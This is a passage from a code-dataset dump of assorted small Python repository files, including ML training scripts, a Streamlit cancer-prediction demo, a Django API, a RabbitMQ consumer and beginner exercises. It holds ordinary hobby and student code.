(0.1 or 0.2) and enormous score for a large difference (0.9 or 1.0).\n# A model with perfect skill has a log loss score of 0.0.\n# In order to summarize the skill of a model using log loss, the log loss is calculated for each predicted probability, and the average loss is reported.\n\n\n\nfrom sklearn.metrics import log_loss\n\nmodel=clf\n# predict probabilities\nprobs = model.predict_proba(X_test)\n# keep the predictions for class 1 only\nprobs = probs[:, 1]\n# calculate log loss\nloss = log_loss(y_test, probs)\nprint (\"Log Loss Score: \",loss)\n\n#do the rest..........\nmodel = [GaussianNB(), KNeighborsClassifier(), SVC(probability=True), DecisionTreeClassifier(), RandomForestClassifier(n_estimators=5, random_state=0), LogisticRegression()]\n\ntest_labels1 = model[1].fit(X_train, y_train).predict_proba(X_test)[:, 1]\ntest_labels2 = model[2].fit(X_train, y_train).predict_proba(X_test)[:, 1]\ntest_labels3 = model[3].fit(X_train, y_train).predict_proba(X_test)[:, 1]\ntest_labels4 = model[4].fit(X_train, y_train).predict_proba(X_test)[:, 1]\ntest_labels5 = model[5].fit(X_train, y_train).predict_proba(X_test)[:, 1]\n\n\n\n\nfpr_gau, tpr_gau, _ = roc_curve(y_test, test_labels1)\nfpr_knn, tpr_knn, _ = roc_curve(y_test, test_labels2)\nfpr_svc, tpr_svc, _ = roc_curve(y_test, test_labels3)\nfpr_dt, tpr_dt, _ = roc_curve(y_test, test_labels4)\nfpr_rf, tpr_rf, _ = roc_curve(y_test, test_labels5)\n\n\n# ROC curve\ngau_roc_auc = roc_auc_score(y_test, test_labels1, average='macro', sample_weight=None)\nknn_roc_auc = roc_auc_score(y_test, test_labels2, average='macro', sample_weight=None)\nsvc_roc_auc = roc_auc_score(y_test, test_labels3, average='macro', sample_weight=None)\ndt_roc_auc = roc_auc_score(y_test, test_labels4, average='macro', sample_weight=None)\nrf_roc_auc = roc_auc_score(y_test, test_labels5, average='macro', sample_weight=None)\n\n\nplt.figure(figsize=(12, 6), linewidth=1)\nplt.plot(fpr_gau, tpr_gau, label='GaussianNB Score: ' + str(round(gau_roc_auc, 5)))\nplt.plot(fpr_knn, tpr_knn, label='KNN Score: ' + str(round(knn_roc_auc, 5)))\nplt.plot(fpr_svc, tpr_svc, label='SVC Score: ' + str(round(svc_roc_auc, 5)))\nplt.plot(fpr_dt, tpr_dt, label='DecisionTreeClassifier Score: ' + str(round(dt_roc_auc, 5)))\nplt.plot(fpr_rf, tpr_rf, label='RandomForestClassifier Score: ' + str(round(rf_roc_auc, 5)))\n\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC Curve ')\nplt.legend(loc='best')\nplt.show()\n\n #High ROC score is good\n\n\n#Optimization\n #1. Cross-validation\n #2. Hyperparameter tuning\n\n # Implementing a cross-validation based approach¶\n\n # Import the cross-validation module\nfrom sklearn.model_selection import cross_val_score\n\n\n# Function that will track the mean value and the standard deviation of the accuracy\ndef cvDictGen(functions, scr, X_train=X_train, y_train=y_train, cv=5):\n cvDict = {}\n for func in functions:\n cvScore = cross_val_score(func, X_train, y_train, cv=cv, scoring=scr)\n cvDict[str(func).split('(')[0]] = [cvScore.mean(), cvScore.std()]\n\n return cvDict\n\ncvD = cvDictGen(model, scr = 'roc_auc')\nprint(cvD)\n # if both mean and std are high that is good model\n\n\n #Implementing hyperparameter tuning¶\n # Import methods\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import randint\n\n #do the rest\n # https://www.kaggle.com/bandiang2/prediction-of-customer-churn-at-a-bank","repo_name":"gowshalinirajalingam/Churn-Prediction","sub_path":"Churn prediction classification.py","file_name":"Churn prediction classification.py","file_ext":"py","file_size_in_byte":13600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25025160386","text":"#Relay Switch Trial Program\r\n#8/17/2013\r\n\r\n#To tell pi by user selection which relay to switch.\r\n\r\n\r\n#Global Variables\r\nstate1=0\r\nstate2=0\r\nstate3=0\r\nstate4=0\r\nuserChoice=0\r\nquitTrigger = 1\r\n\r\n#main program\r\n\r\ndef main():\r\n relaySwitch()\r\n \r\ndef relaySwitch():\r\n print(\"Press 0 to quit\")\r\n outputRelayStatus()# Tell what state each relay is in\r\n\r\n #Request user input\r\n global userChoice\r\n global quitTrigger\r\n while (quitTrigger == 1):\r\n userChoice = int(input(\"Enter which switch you want to change:\"))\r\n changeOutput()\r\n outputRelayStatus()\r\n#def queryPiRelayStatus():#For use with actual relay\r\n \r\ndef outputRelayStatus():#Output Relay Status\r\n s1=\"\"\r\n s2=\"\"\r\n s3=\"\"\r\n s4=\"\"\r\n if state1 == 0:\r\n s1 = \"Off\"\r\n else:\r\n s1 = \"On\"\r\n if state2 == 0:\r\n s2 = \"Off\"\r\n else:\r\n s2 = \"On\"\r\n if state3 == 0:\r\n s3 = \"Off\"\r\n else:\r\n s3 = \"On\"\r\n if state4 == 0:\r\n s4 = \"Off\"\r\n else:\r\n s4 = \"On\"\r\n print(\"Relay / Status: \")\r\n print(\" One = \",s1)\r\n print(\" Two = \",s2)\r\n print(\" Three = \",s3)\r\n print(\" Four = \",s4)\r\n print(\"\")\r\n\r\ndef changeOutput(): #Evaluate user choice and make change\r\n global state1\r\n global state2\r\n global state3\r\n global state4\r\n global quitTrigger\r\n if userChoice == 0:\r\n quitTrigger = 0\r\n print (\"\")\r\n print (\"\")\r\n print (\"\")\r\n \r\n elif userChoice == 1:\r\n if state1 == 1:\r\n state1=0\r\n else:\r\n state1=1\r\n elif userChoice == 2:\r\n if state2 == 1:\r\n state2=0\r\n else:\r\n state2=1\r\n elif userChoice == 3:\r\n if state3 == 1:\r\n state3=0\r\n else:\r\n state3=1\r\n elif userChoice == 4:\r\n if state4 == 1:\r\n state4=0\r\n else:\r\n state4=1\r\n else:\r\n print (\"Number must be between 0 and 4\")\r\n \r\n\r\nmain()\r\n","repo_name":"lriliin/Lriliin","sub_path":"RelaySwitch as module.py","file_name":"RelaySwitch as module.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71398355413","text":"import streamlit as st\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport pickle\n\nst.set_page_config(layout='centered', page_icon='👩‍⚕️', page_title='Cancer Detection App')\n\nst.title('Aplicación Realizada por Alumnos de la UAX para la detección temprana de Cancer de Mama')\n\nst.image(Image.open('src/images/cancer.png'))\nst.sidebar.image(Image.open('src/images/uax.png'))\nst.subheader('A continuación introduce los siguiente datos para que la aplicación pueda realizar la predicción:')\n\nradio = float(st.text_input('Radio', 0))\nsimetria = float(st.text_input('Simetria', 0))\ncompacticidad = float(st.text_input('Compacticidad', 0))\ntextura = float(st.text_input('Textura', 0))\n\ndata = {'mean radius': radio,\n 'mean symmetry': simetria,\n 'mean compactness': compacticidad,\n 'mean texture': textura}\n\ndf = pd.DataFrame(data, index=[0])\n\nst.subheader('Compruebe que los datos introducidos son correctos')\n\nst.table(df)\n\nenviar = st.button('Enviar datos')\n\nif enviar:\n\n mm = pickle.load(open('src/scaler.pkl', 'rb'))\n lr = pickle.load(open('src/logisticregression.pkl', 'rb'))\n\n df = mm.transform(df)\n pred = lr.predict(df)\n\n if pred[0] == 1:\n st.title('''Buenas noticas\n Con un 90.6 % de probabilidad podemos afirmar que el tumor es benigno''')\n else:\n st.title('''Sentimos comuniarle con un 90.6 % de probabilidad que el tumor puede ser maligno \n Pida cita con su médico para recibir tratamiento lo antes posible''')","repo_name":"Ironhack-UAX-Bootcamp-Oct-22/Apuntes-de-Clase","sub_path":"Apuntes Clase/Week_6/Day_2/Streamlit/cancer.py","file_name":"cancer.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42955301665","text":"from ..GPU_np import np\nfrom .Optimizer import Optimizer\n\n\nclass AdamOptimizer(Optimizer):\n def __init__(self, beta1=0.9, beta2=0.999):\n super().__init__()\n self.first_moment = []\n self.second_moment = []\n self.beta1 = np.asarray([beta1])\n self.beta2 = np.asarray([beta2])\n self.pow_beta1 = np.asarray([1.0])\n self.pow_beta2 = np.asarray([1.0])\n\n def append(self, parameter, alpha=0):\n super().append(parameter, alpha)\n self.first_moment.append(np.zeros(parameter.shape))\n self.second_moment.append(np.zeros(parameter.shape))\n\n def update(self, learning_rate=1e-3):\n self.pow_beta1 *= self.beta1\n self.pow_beta2 *= self.beta2\n for i in range(len(self.parameter_list)):\n value, grad = self.parameter_list[i].value, self.parameter_list[i].grad\n grad += self.alpha_list[i] * value\n self.first_moment[i] = self.beta1 * self.first_moment[i] + (1 - self.beta1) * grad\n self.second_moment[i] = self.beta2 * self.second_moment[i] + (1 - self.beta2) * np.square(grad)\n first_unbias = self.first_moment[i] / (1 - self.pow_beta1)\n second_unbias = self.second_moment[i] / (1 - self.pow_beta2)\n value -= learning_rate * first_unbias / (np.sqrt(second_unbias) + 1e-8)\n\n def set_data(self, data_iter):\n super().set_data(data_iter)\n for i in range(len(self.first_moment)):\n self.first_moment[i] = next(data_iter)\n\n for i in range(len(self.second_moment)):\n self.second_moment[i] = next(data_iter)\n\n self.beta1 = next(data_iter)\n self.pow_beta1 = next(data_iter)\n self.beta2 = next(data_iter)\n self.pow_beta2 = next(data_iter)\n\n def get_data(self):\n return super().get_data()\\\n + self.first_moment\\\n + self.second_moment\\\n + [self.beta1, self.pow_beta1, self.beta2, self.pow_beta2]\n\n","repo_name":"JustinRochester/torch-CNN","sub_path":"CNN-practice/CNNs/CNN/Optimizers/Adam.py","file_name":"Adam.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18935258772","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport h5py\nimport numpy as np\nfrom sortedcontainers import SortedList\nfrom torch.utils.data import Dataset\nfrom tqdm import tqdm\nimport librosa\n\n# Name of the database in your directory\ndataset_name = \"small_dataset\"\n\n# Sampling Rates vary a lot in our dataset, so we normalize to 22050 (the defauuult in a lot of work)\nsr = 22050\n# 2 channels for stereo sound, I think they use this in the paper but Im really not sure\nchannels = 2\n\ndata = \"train_data\"\n\ndata_path = dataset_name + '/' + data + '/'\n########################################\n# Loading the sound files\n########################################\n\npath = data_path + 'mixed/'\nfile_list = os.listdir(path)\n\nbad_index = []\nmixed_samples = []\nfor idx, file in enumerate(file_list):\n file_path = path + file\n y, curr_sr = librosa.load(file_path, sr=sr, mono=True, res_type='kaiser_fast', offset=0, duration=4)\n if len(y) == 88200: #Check if files have the right length (duration * sr)\n mixed_samples.append(y)\n else:\n print(idx, \"wrong length audio file\") #should just be a check in the end that doesnt get triggered if we have correct data\n bad_index.append(idx)\n \n\npath = data_path + 'clean/'\nfile_list = os.listdir(path)\n\nclean_samples = []\nfor idx, file in enumerate(file_list):\n file_path = path + file\n y, curr_sr = librosa.load(file_path, sr=sr, mono=True, res_type='kaiser_fast', offset=0, duration=4)\n if idx not in bad_index:\n clean_samples.append(y)\n\n \npath = data_path + 'noise/'\nfile_list = os.listdir(path)\n\nnoise_samples = []\nfor idx, file in enumerate(file_list):\n file_path = path + file\n y, curr_sr = librosa.load(file_path, sr=sr, mono=True, res_type='kaiser_fast', offset=0, duration=4)\n if idx not in bad_index:\n noise_samples.append(y)\n \n########################################\n# Create HDF and save the sounds there\n########################################\n\n\npartition = \"small_\" + data\n\nhdf_dir = '\\\\hdf_files'\nprint(hdf_dir)\n\nos.makedirs(os.getcwd() + hdf_dir, mode=0o777, exist_ok=True)\nhdf_file = os.path.join(os.getcwd() + hdf_dir, partition + \".hdf5\")\n\n\ninstruments = [\"speech\", \"noise\"]\n\n\nwith h5py.File(hdf_file, \"w\") as f:\n f.attrs[\"sr\"] = sr\n f.attrs[\"channels\"] = channels\n f.attrs[\"instruments\"] = instruments\n \n for idx, mix_audio in enumerate(mixed_samples):\n \n clean_audio = clean_samples[idx]\n noise_audio = noise_samples[idx]\n # Get the separate samples in the right format\n source_audios = []\n source_audios.append(clean_audio)\n source_audios.append(noise_audio)\n source_audios = np.concatenate(source_audios, axis=0)\n # Create file\n grp = f.create_group(str(idx))\n grp.create_dataset(\"inputs\", shape=mix_audio.shape, dtype=mix_audio.dtype, data=mix_audio)\n grp.create_dataset(\"targets\", shape=source_audios.shape, dtype=source_audios.dtype, data=source_audios)\n grp.attrs[\"length\"] = mix_audio.shape[0]\n grp.attrs[\"target_length\"] = source_audios.shape[0]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nicoloddo/WaveDenoiserNN","sub_path":"data_to_hdf.py","file_name":"data_to_hdf.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14447695864","text":"from rest_framework.permissions import BasePermission, SAFE_METHODS\n\n\nclass IsOwnerOrStaffOrReadOnly(BasePermission):\n # Проверяем разрешение на действия над объектом.\n # Удостоверимся, что запрос пришел от пришел от аутентифицированного владельца книги\n # или от авторизованного персонала компании\n def has_object_permission(self, request, view, obj):\n return bool(\n request.method in SAFE_METHODS or\n request.user and\n request.user.is_authenticated and\n (\n obj.owner == request.user or\n request.user.is_staff\n )\n )\n","repo_name":"Ulftar/books","sub_path":"store/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16289046587","text":"\r\nfrom django.urls import path\r\n\r\nfrom django.urls import path\r\nfrom . views import *\r\n\r\n\r\nurlpatterns = [\r\n path('',ListTodoAPIView.as_view(),name='todo'),\r\n path('/detail',TodoDetailAPIView.as_view(),name='detail'),\r\n path('create',CreateTodoAPIView.as_view(),name='create'),\r\n path('/update',UpdateTodoAPIView.as_view(),name='update'),\r\n path('/delete',DeleteTodoAPIView.as_view(),name='delete'),\r\n # path('/',Redirector.as_view(),name='redirector'),\r\n]","repo_name":"Shabana-12/URL_SHORTNER_DJANGO_REST_API","sub_path":"shortnerapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37555998288","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Graph analysis on test routes\n\"\"\"\n__license__ = None\n\nimport argparse\nimport logging\nimport sys\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom stanalysis.graphbuilder import build_graph\nimport stanalysis.graphtools as graphtools\n\nlog = logging.getLogger(__name__)\n\n\ndef main(args):\n parser = argparse.ArgumentParser()\n parser.add_argument('output', metavar='graph.pickle',\n help='Ouput graph file')\n parser.add_argument(\n '--connection',\n default='postgresql://osm:osm@localhost/osrm',\n help='Postgres connection string. Default %(default)s'\n )\n parser.add_argument('--prune', action='store_true',\n help='Collapse redundant edges, prune tails')\n\n parser.add_argument('--verbose', action='store_true',\n help='Increase logging level')\n\n args = parser.parse_args()\n\n logging.basicConfig(\n level=logging.INFO if args.verbose else logging.WARNING)\n\n log.info(\"Creating DB engine\")\n engine = create_engine(args.connection, echo=False)\n\n log.info(\"Creating DB session\")\n Session = sessionmaker(bind=engine)\n session = Session()\n\n g = build_graph(session)\n\n if args.prune:\n log.info(\"Collapsing unidirectional strings\")\n pruned = graphtools.collapse_degree_2_vtxs(g)\n log.info(\"Removed %i thru-nodes\", pruned)\n log.info(\"Collapsing bidirectional strings\")\n pruned = graphtools.collapse_bidirectional_streets(g)\n log.info(\"Removed %i thru-nodes\", pruned)\n log.info(\"Snipping tails\")\n snipped = graphtools.delete_degree_1_vtxs(g)\n log.info(\"Removed %i tails\", snipped)\n loners = graphtools.delete_degree_0_vtxs(g)\n log.info(\"Removed %i loner-nodes (should be zero)\", loners)\n redundancies = graphtools.identify_rendudant_nodes(g)\n log.info(\"Marked %i nodes as redundant\", redundancies)\n\n log.info(\"Saving graph to %s\", args.output)\n g.save(args.output)\n\nif __name__ == \"__main__\": # pragma: nocover\n sys.exit(main(sys.argv))\n","repo_name":"ekfriis/scientraffic-analysis","sub_path":"graphroutes.py","file_name":"graphroutes.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15366710085","text":"#!/usr/bin/env python\n\nfrom os import environ\nfrom datetime import datetime\nimport pika\nfrom pipeline.shared.rabbitmq_conn import get_rabbitmq_conn\nfrom dronelogs.shared.db_conn import get_db_conn\nfrom dronelogs.shared.get_uuid_from_string import get_uuid\n\nSTEP_NAME = 'init'\n\ndef check_dependency(cursor, uuid):\n tablename = environ['PIPILE_NAME']\n query = f\"SELECT * FROM {tablename} \"\n query += \"WHERE uuid = %s;\"\n cursor.execute(query, (uuid,))\n return cursor.fetchone()\n\ndef insert_row(cursor, uuid, file_name):\n tablename = environ['PIPILE_NAME']\n values = (uuid, file_name, datetime.now())\n sql_str = f\"INSERT INTO {tablename} \"\n sql_str += \"(uuid, file_name, started_at) VALUES (%s, %s, %s)\"\n cursor.execute(sql_str, values)\n\ndef callback(ch, method, properties, body):\n file_name = body.decode(\"utf-8\")\n uuid = get_uuid(file_name)\n if isinstance(uuid, str):\n connection = get_db_conn()\n if connection:\n cursor = connection.cursor()\n dependency_met = check_dependency(cursor, uuid)\n if dependency_met is None:\n insert_row(cursor, uuid, file_name)\n connection.commit()\n cursor.close()\n connection.close()\n ch.queue_declare(queue='decrypt', durable=True)\n ch.basic_publish(\n exchange=environ['PIPILE_NAME'],\n routing_key=\"decrypt\",\n body=file_name,\n properties=pika.BasicProperties(delivery_mode=2)\n )\n ch.basic_ack(delivery_tag=method.delivery_tag)\n else:\n print(\"Failed\")\n ch.basic_nack(delivery_tag=method.delivery_tag, requeue=True)\n else:\n print(f\"Failed {file_name}\")\n ch.basic_nack(delivery_tag=method.delivery_tag, requeue=False)\n\ndef init():\n connection = get_rabbitmq_conn()\n channel = connection.channel()\n channel.exchange_declare(\n exchange=environ['PIPILE_NAME'],\n exchange_type='direct'\n )\n result = channel.queue_declare(queue='', exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(\n exchange=environ['PIPILE_NAME'],\n queue=queue_name,\n routing_key=STEP_NAME\n )\n prefetch = int(environ['CONSUMER_PRE_FETCH'])\n channel.basic_qos(prefetch_count=prefetch)\n channel.basic_consume(\n queue=queue_name,\n auto_ack=False, # this is the default behaviour of acknowledgement,\n # we need to send it ourself and we do it through the last line of the callback function\n on_message_callback=callback\n )\n print(' [*] Waiting for messages. To exit press CTRL+C')\n channel.start_consuming()\n\n\nif __name__ == \"__main__\":\n try:\n init()\n except KeyboardInterrupt:\n print('Bye!')\n","repo_name":"jpmolinamatute/airflow-rabbitmq-demo","sub_path":"pipeline/rabbitmq/init/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6408770739","text":"# Maior e menor valores\na = int(input('1° valor: '))\nb = int(input('2° valor: '))\nc = int(input('3° valor: '))\nmaior = a\nif b > a and b > c:\n maior = b\nif c > a and c > b:\n maior = c\n\nmenor = a\nif b < a and b < c:\n menor = b\nif c < a and c < b:\n menor = c\nprint(f'o maior numero e {maior}')\nprint(f'o menor numero e {menor}')\n","repo_name":"ranie2019/GuanabaraExercicios","sub_path":"33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23932487770","text":"from datetime import date\r\ntoday = date.today()\r\nformat_string = \"%d-%m-%Y\"\r\n\r\n\r\nclass Product_List(object):\r\n def __init__(self, item_name, price, quantity, expiry_date):\r\n self.__item_name = item_name\r\n self.__price = price\r\n self.__quantity = quantity\r\n self.__expiry_date = expiry_date\r\n\r\n def show_list(self):\r\n print(\"Item:\", self.__item_name, \"Price:\", (str(self.__price))+(\"€\"), \"Available_quantity:\", self.__quantity)\r\n\r\n def expired_product(self):\r\n if self.__expiry_date == today:\r\n return \"The item\", self.__item_name, \"has expired.\"\r\n\r\n def remove_item(self, amount):\r\n if self.__quantity > 0:\r\n self.__quantity = self.__quantity - amount\r\n return self.__quantity\r\n\r\n def add_item(self, amount):\r\n self.__quantity = self.__quantity + amount\r\n return self.__quantity\r\n\r\n def add_price(self, value):\r\n self.__price = self.__price + value\r\n return (str(self.__price))+(\"€\")\r\n\r\n def reduce_price(self, value):\r\n self.__price = self.__price - value\r\n return (str(self.__price))+(\"€\")\r\n\r\n def order_required(self):\r\n if self.__quantity < 10:\r\n return \"Warning! The stock for \", self.__item_name, \"is low\"\r\n\r\n\r\nclass Customer(object):\r\n def __init__(self, name):\r\n self.name = name\r\n self.total = 0\r\n self.items = {}\r\n print(\"Welcome\", name)\r\n\r\n def add_item(self, item_name, quantity, price):\r\n self.total += price * quantity\r\n self.items.update({item_name: quantity})\r\n return \"The item\", item_name, \"has been added to your cart\"\r\n\r\n def remove_item(self, item_name, quantity, price):\r\n if item_name in self.items:\r\n if quantity < self.items[item_name] and quantity > 0:\r\n self.items[item_name] -= quantity\r\n self.total -= price * quantity\r\n elif quantity >= self.items[item_name]:\r\n self.total -= price * self.items[item_name]\r\n del self.items[item_name]\r\n return \"The item\", item_name, \"has been removed from your cart\"\r\n\r\n def show_customer_cart(self):\r\n return \"Selected products are:\", (\"Item/Quantity\")+(str(self.items)), \"Total_cost =\", str(self.total)+(\"€\")\r\n\r\n def checkout(self, amount_paid):\r\n if amount_paid > self.total:\r\n print(\"Your paid:\", str(amount_paid))\r\n return \"Thanks for shopping with us, your balance is:\", (str(amount_paid - self.total))+(\"€\"), \"Have a nice Day!\"\r\n\r\n elif amount_paid == self.total:\r\n return \"Balance = 0€, Thanks for shopping with us, Have a nice Day!\"\r\n\r\n\r\n\r\nproduct1 = Product_List(\"bread\", 2, 7, today)\r\nproduct1.remove_item(4)\r\nproduct1.add_price(0.30)\r\nprint(product1.show_list())\r\nprint(product1.expired_product())\r\nprint(product1.order_required())\r\n\r\n\r\nproduct2 = Product_List(\"Milk\", 1, 12, 12-10-2021)\r\nproduct2.add_item(20)\r\nprint(product2.show_list())\r\n\r\nguest1 = Customer(\"Andrew\")\r\nguest1.add_item(\"Milk\", 4, 2.00)\r\nguest1.add_item(\"Butter\", 1, 2.50)\r\nprint(guest1.add_item(\"Oranges\", 2, 2.00))\r\nprint(guest1.remove_item(\"Milk\", 1, 2.00))\r\nprint(guest1.show_customer_cart())\r\nprint(guest1.checkout(12.5))\r\n\r\n","repo_name":"kalyanishanmugam/shopping_website","sub_path":"Shopping_Cart_3.py","file_name":"Shopping_Cart_3.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15982494191","text":"import os\nimport time\nimport torch\nfrom torch.optim import AdamW\nfrom fastNLP import TorchWarmupCallback, FitlogCallback, CheckpointCallback, LoadBestModelCallback, TorchDataLoader\nfrom fastNLP import RandomSampler, SequentialSampler, prepare_torch_dataloader\nfrom fastNLP import cache_results, Trainer, Evaluator, Event, print\n\nfrom transformers import AutoTokenizer, AutoModel\n\nfrom parse import parse_args\nfrom pipe import EBDataPipe\nfrom model import EBRLModel\nfrom utils import EBRLMetric, ScheduledSamplingCallback, EBPredMetric, EBPredMetricWithPara\n\nimport logging\nimport fitlog\n\n\ndef do_train():\n # 1. logs and args\n logging.basicConfig(level=logging.INFO)\n logging.info('Start logging ଘ(੭ˊᵕˋ)੭')\n args = parse_args()\n # fitlog.debug()\n fitlog.commit(__file__)\n fitlog.set_log_dir('logs')\n fitlog.add_hyper(args)\n fitlog.add_hyper_in_file(__file__)\n if args.seed != 0:\n fitlog.set_rng_seed(args.seed)\n print(\"Set random seed as\", args.seed)\n else:\n fitlog.set_rng_seed()\n\n save_dir = args.model_type\n if args.learning_rate != 1e-5:\n save_dir += '_lr' + str(args.learning_rate)\n if args.dropout != 0.1:\n save_dir += '_drop' + str(args.dropout)\n if args.K != 2:\n save_dir += '_K' + str(args.K)\n if args.gradient_accumulation_steps != 1:\n save_dir += '_acc' + str(args.gradient_accumulation_steps)\n if args.discount != 0.99:\n save_dir += '_dis' + str(args.discount)\n if args.warmup_proportion != 0:\n save_dir += '_w' + str(args.warmup_proportion) + '_' + str(args.schedule)[0]\n if args.seed != 42:\n save_dir += '_rnd' + str(args.seed)\n save_dir += '_ep' + str(args.num_epochs)\n save_dir = os.path.join('outputs', args.model_save_dir, save_dir)\n\n if not os.path.exists(save_dir):\n os.makedirs(save_dir, exist_ok=True)\n\n paths = {'train': os.path.join(args.data_dir, 'train.jsonl'),\n 'dev': os.path.join(args.data_dir, 'dev.jsonl'),\n 'test': os.path.join(args.data_dir, 'test.jsonl')}\n\n # 2. data\n tokenizer = AutoTokenizer.from_pretrained(args.policy_model_config, local_files_only=True)\n data_save_path = os.path.join(args.data_dir, args.data_save_path)\n print(\"data_save_path:\", data_save_path)\n\n @cache_results(data_save_path, _refresh=args.refresh_data)\n def get_data(test=False):\n pipe = EBDataPipe(tokenizer, args)\n _data_bundle = pipe.process_from_file(paths, test)\n return _data_bundle\n\n train_data_bundle = get_data(test=False)\n # print(train_data_bundle)\n train_data = train_data_bundle.get_dataset('train')\n\n eval_data_bundle = get_data(_cache_fp=os.path.join(args.data_dir, args.test_data), test=True)\n logging.info(\"Using [Eval] data to test.\")\n dev_data = eval_data_bundle.get_dataset('dev')\n test_data = eval_data_bundle.get_dataset('test')\n\n train_dl = prepare_torch_dataloader(train_data, batch_size=args.train_batch_size, sampler=RandomSampler(train_data))\n dev_dl = prepare_torch_dataloader(dev_data, batch_size=args.eval_batch_size, sampler=SequentialSampler(dev_data))\n test_dl = prepare_torch_dataloader(test_data, batch_size=args.eval_batch_size, sampler=SequentialSampler(test_data))\n\n # 3. model\n model = EBRLModel(args)\n\n if len(args.device) == 1:\n device = int(args.device[0])\n else:\n device = [int(d) for d in args.device]\n\n if args.do_train:\n if args.pred_para:\n pred_save_dir = os.path.join(save_dir, 'pred_para.tsv')\n else:\n pred_save_dir = os.path.join(save_dir, 'pred.tsv')\n\n if args.policy_model_path is not None:\n warmup_model_dict = torch.load(args.policy_model_path)\n model_dict = model.state_dict()\n\n # 1) filter out unnecessary keys\n recover_dict = {k: v for k, v in warmup_model_dict.items() if k in model_dict}\n # 2) overwrite entries in the existing state dict\n model_dict.update(recover_dict)\n # 3) load the new state dict\n model.load_state_dict(model_dict)\n logging.info('Loaded parameters from warming up model at ' + str(args.policy_model_path) + '.')\n else:\n pretrained_model = AutoModel.from_pretrained(args.policy_model_config)\n model = EBRLModel(args, ptm=pretrained_model)\n print(\"Use pretrained model parameter without warmup training.\")\n\n # 4. loss, optimizer, metric\n # loss = LossInForward()\n\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay},\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0}]\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate)\n\n metric = {\"rlet\": EBRLMetric()}\n\n # 5. callbacks and trainer\n\n model_save_dir = os.path.join(save_dir, \"checkpoint\")\n callbacks = [TorchWarmupCallback(warmup=args.warmup_proportion, schedule=args.schedule),\n FitlogCallback(log_loss_every=200),\n LoadBestModelCallback(save_folder=model_save_dir, only_state_dict=True),\n CheckpointCallback(folder=model_save_dir, topk=2, monitor='F1#rlet#test',\n only_state_dict=True),\n\n ScheduledSamplingCallback(args.sampling)]\n logging.info('Start training ଘ( ˊ•̥▵•)੭₎₎')\n\n # result_save_dir = os.path.join(save_dir, args.result_dir)\n\n result_save_dir = os.path.join(save_dir, args.result_dir)\n if not os.path.exists(result_save_dir):\n os.makedirs(result_save_dir, exist_ok=True)\n\n @Trainer.on(Event.on_before_backward(every=400))\n def print_loss(trainer, outputs):\n print(f\"train_loss: {outputs['loss']}\")\n\n if args.evaluate_before_train:\n t_begin = time.time()\n evaluator = Evaluator(model, driver='torch', device=device, dataloaders=test_dl,\n metrics=metric,\n progress_bar='rich',\n kwargs={\"use_dist_sampler\": False},\n fp16=args.fp16\n )\n\n evaluator.run()\n t_end = time.time()\n print(f'Finished evaluating on TEST {len(test_data)} examples.')\n print(f'Test (before train) duration: {t_end - t_begin} sec.')\n\n t_train_begin = time.time()\n\n trainer = Trainer(model=model,\n train_dataloader=train_dl,\n optimizers=optimizer,\n driver='torch',\n device=device,\n evaluate_dataloaders={\"dev\": dev_dl, \"test\": test_dl},\n metrics=metric,\n callbacks=callbacks,\n output_mapping=None,\n n_epochs=args.num_epochs,\n evaluate_every=args.eval_step,\n accumulation_steps=args.gradient_accumulation_steps,\n fp16=args.fp16,\n torch_kwargs={'ddp_kwargs': {'find_unused_parameters': True}},\n monitor='F1#rlet#test',\n # overfit_batches=300\n )\n\n trainer.run()\n t_train_end = time.time()\n logging.info(f'Training duration: {round((t_train_end - t_train_begin)/60, 4)} minutes, '\n f'i.e., {round((t_train_end - t_train_begin)/3600, 4)} hours.')\n else:\n # model.load_state_dict(torch.load(args.model_path).state_dict())\n model.load_state_dict(torch.load(args.policy_model_path))\n logging.info('[Eval] Loaded actor parameters from test model at ' + str(args.policy_model_path) + '.')\n\n pred_save_dir = os.path.split(args.policy_model_path)[0]\n \n if args.pred_para:\n pred_save_dir = 